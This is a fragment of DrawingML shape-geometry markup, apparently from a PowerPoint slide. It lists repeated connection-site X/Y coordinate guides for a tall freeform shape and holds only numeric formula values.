              <a:gd name="connsiteX150" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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4870 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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4870 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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4870 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1168288 h 6858000"/>
